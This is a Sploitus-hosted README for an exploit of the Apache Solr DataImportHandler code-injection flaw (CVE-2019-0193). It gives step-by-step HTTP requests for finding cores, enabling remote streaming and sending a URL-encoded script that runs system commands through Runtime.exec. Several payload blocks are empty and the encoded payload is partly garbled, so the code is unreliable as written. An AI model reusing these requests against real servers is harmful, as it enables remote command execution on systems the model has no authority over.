Sploitus

Exploit for Code Injection in Apache Solr

githubexploit Β· 2019-08-12

Exploit Code

README191 lines
## https://sploitus.com/exploit?id=7079E7AF-2008-53D1-B341-626DD01FC788
### Declaration

The vulnerability detection methods, documentation, and other content provided herein are limited to use by security practitioners under legal authorization for the purpose of testing the security of authorized servers. Security practitioners must comply with legal requirements and are prohibited from doing any vulnerability testing without authorization.

### Introduction

[Vulnerability Analysis - Apache Solr Remote Code Execution Vulnerability (CVE-2019-0193) - Prophet Community](https://xz.aliyun.com/t/5965)

Exploit can theoretically be constructed using a variety of different types of data sources

Exploit1 uses a datasource of type `URLDataSource`

Exploit2 uses a data source of type `ContentStreamDataSource`


### Detecting vulnerabilities - Exploit1

Exploit1 uses a data source of type `URLDataSource`.

Advantages: results back Support for detection of low versions of Solr

Disadvantages: requires out-of-network


#### Step 1

Construct a data source of type `URLDataSource` (which the Solr server will go to!). You can use this directly

https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml

Document `demo.xml` i.e. `URLDataSource` type datasource A harmless normal XML document.

There is only one `item` element in the document so that only one command is executed.


You can also start your own web server to host the document `demo.xml` with the command `live-server --port=5555` to get the address `http://127.0.0.1:5555/demo.xml`.

#### Step 2

Get the names of all indexed cores in Solr.

```
http://{xx.com:80}/solr/admin/cores

HTTP response JSON data will have the names of all indexed cores.

"name": "xxxx"
```

#### Step 3

Determine if the indexed library is using the DataImportHandler module

Method 1
``
Access
http://{xx.com:80}/solr/{core_name}/admin/mbeans?cat=QUERY&wt=json

If the DataImportHandler module is used, the HTTP response will contain.
org.apache.solr.handler.dataimport.DataImportHandler

Otherwise, the DataImportHandler module is not used (and is not affected by this vulnerability).
``

Method 2
``
Visit
http://{xx.com:80}/solr/#/{core_name}/dataimport

If this Solr server does not use the dataimport-handler module (which is not affected by this vulnerability), the HTTP response will indicate:
sorry, no dataimport-handler defined!

Otherwise, the DataImportHandler module (which is not affected by this vulnerability) is used.
``

#### Step 4 Constructing the HTTP request

Execute commands HTTP response has execution result display back Multi-line result supported (I wrote each line ending with `\n\r`)

Note: You need to replace the string "tika" in the following request url with the name of the indexing library.

```
POST /solr/tika/dataimport HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1231
Connection: close

command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=












``


### Detecting vulnerabilities - Exploit2

Exploit2 uses a data source of type ``ContentStreamDataSource``.

Advantages: Results are displayed without going offline.

Disadvantage:Undetectable for lower versions - because modifying the configuration in the `configoverlay.json` file via a POST request will fail

#### Steps 1-3

Step 1 omitted

Steps 2-3 Same as above

#### Step 4

This step is to modify the configuration in the `configoverlay.json` file to enable the remote streaming options `.enableStreamBody` `.enableRemoteStreaming`.

Replace `tika` with the index library name

```
POST /solr/tika/config HTTP/1.1
Host: 127.0.0.1
Accept: */*
Content-type:application/json
Content-Length: 159
Connection: close

{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}, "set-property": {"requestDispatcher.requestParsers. enableStreamBody": true}}
``

Response 200 is successful (real test 8.1 can be successful)

Responding with 500 fails (in practice, some lower versions will fail).

#### Step 5

Send a request to execute the system command `ifconfig` and get a message back (no outgoing connection, no network outage).

POST /solr/tika/dataimport?command=full-import
POST /solr/tika/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport& dataConfig=%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%73 72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%65 76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%20%6a%61%76%61%61%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%20 6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%6e 65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78 65%63%28%22%69%66%63%6f%6e%66%69%67%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73 75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52 65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%69%3d%20%62%75%66%52%6e 66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c% 74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70 74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22  75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45 6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%72%61%6e%73%66%6f%72%6d%65%72%3d%22%74%74%69%74%79%3d%22%74%72%75%65%22%0a%20  6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%64%6c%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%2f%3c 65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0a%20%20%20%20%20%20%20%20 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-Length: 212
content-type: multipart/form-data; boundary=------------------------aceb88c2159f183f


--------------------------aceb88c2159f183f
Content-Disposition: form-data; name="stream.body"






--------------------------aceb88c2159f183f--

``



Note that the value of dataConfig, before URLencode, is the following string
```












``